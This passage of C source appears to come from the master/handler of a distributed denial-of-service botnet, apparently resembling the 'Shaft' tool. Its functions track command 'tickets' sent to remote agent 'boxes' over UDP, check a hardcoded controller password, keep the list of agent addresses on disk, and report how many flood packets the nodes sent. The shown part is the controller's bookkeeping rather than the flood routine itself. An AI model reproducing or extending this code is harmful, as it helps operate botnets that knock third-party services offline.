        int ticketz = atoi(udp->str[3]);
        char *val  = udp->str[4];

        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

	curr->val++;

        return 1;
}

int proc_udp_pktres(CACHE *udp)
{
	TICKET *curr = NULL;
	int socet = atoi(udp->str[2]);
	int ticketz = atoi(udp->str[3]);
	unsigned long int val = atol(udp->str[4]);

	curr = fnLocateTicket(ticketz);

	if (!curr)
		return 0;

	curr->val += val;
	curr->val2++;
	
	return 1;
}

int proc_udp_time(CACHE *udp)
{
	TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
        int ticketz = atoi(udp->str[3]);
        char *val  = udp->str[4];
        
        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

        bwrite(socket,"\n%i: nodes verified time set to %s\n",ticketz,val);

        if (curr->type == WAIT_ONE)
                fnDeleteTicket(curr);	

	return 1;
}


int proc_udp_type(CACHE *udp)
{
	TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
        int ticketz = atoi(udp->str[3]);
        char *val  = udp->str[4];
        
        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

        bwrite(socket,"\n%i: nodes verified type set to %s\n",ticketz,val);

        if (curr->type == WAIT_ONE)
                fnDeleteTicket(curr);

	return 1;
}

int proc_udp_size(CACHE *udp)
{
	TICKET *curr = NULL;
        int socket = atoi(udp->str[2]);
        int ticketz = atoi(udp->str[3]);
        char *val  = udp->str[4];
        
        curr = fnLocateTicket(ticketz);

        if (!curr)
                return 0;

        bwrite(socket,"\n%i: nodes verified size set to %s\n",ticketz,val);

        if (curr->type == WAIT_ONE)
                fnDeleteTicket(curr);

	return 1;
}

int fnBoxExists(unsigned long int addr)
{
	int count = 0;

	for (count = 0;count < global.bcount;count++)
	{
		if (global.inetaddy[count] == addr)
		{	
			return 1;
		}
	}

	return 0;
}

int fnAddBox(unsigned long int addr)
{
	FILE *fd;

	if ((global.bcount+1) == MAX_BOXES)
		return 0;
	
	global.inetaddy[global.bcount++] = addr;

	if ((fd = fopen(BOX_FILE,"a")) == NULL)
		return 0;

	fprintf(fd,"%i\n",addr);

	fclose(fd);

	return 1;
}

int fnDelBox(unsigned long int addr)
{
	int count, found = 0;
	unsigned long int b;
	FILE *fd, *fd2;
	char buf[256];

	for (count = 0;count < global.bcount;count++)
	{
		if (global.inetaddy[count] == addr)
			found = 1;

		if (found)
			global.inetaddy[count] = global.inetaddy[count+1];
	}

	global.bcount--;

	if (!found)
		return 0;

	if ((fd = fopen(BOX_FILE,"r")) == NULL)
		return 0;

	if ((fd2 = fopen(".t","w")) == NULL)
		return 0;

	while (fgets(buf,256,fd))
	{
		buf[strlen(buf)-1] = 0;

		b = atoi(buf);	
		
		if (b != addr)
			fprintf(fd2,"%s\n",buf);
	}

	fclose(fd);
	fclose(fd2);

	if ((fd = fopen(BOX_FILE,"w")) == NULL)
		return 0;
	if ((fd2 = fopen(".t","r")) == NULL)
		return 0;

	while (fgets(buf,256,fd2))
		fprintf(fd,"%s",buf);

	fclose(fd);
	fclose(fd2);	
	
	remove(".t");

	return 1;
}

int fnCheckUDPPassword(char *pw)
{
	if (!strcmp(pw,SHIF_PASS))
		return 1;

	return 0;
}

void fnCheckTickets()
{
	TICKET *curr = ticket;

	while (curr)
	{
		if (curr->purge <= global.currtime)
		{
			if (fnUserLocate(curr->reqby))
			{
				if (curr->type == WAIT_ALL)
					bwrite(curr->reqby,"%i: %lu/%i boxes responded.\n",curr->ticketnum,curr->val,global.bcount);
				if (curr->type == WAIT_PKSTAT)
					bwrite(curr->reqby,"%i: %lu total packets sent from %lu/%i nodes for %i secs.\n",curr->ticketnum,curr->val,curr->val2,global.bcount,global.time);
			}

			fnDeleteTicket(curr);

			return;
		}
		
		curr = curr->next;
	}

	return;
}
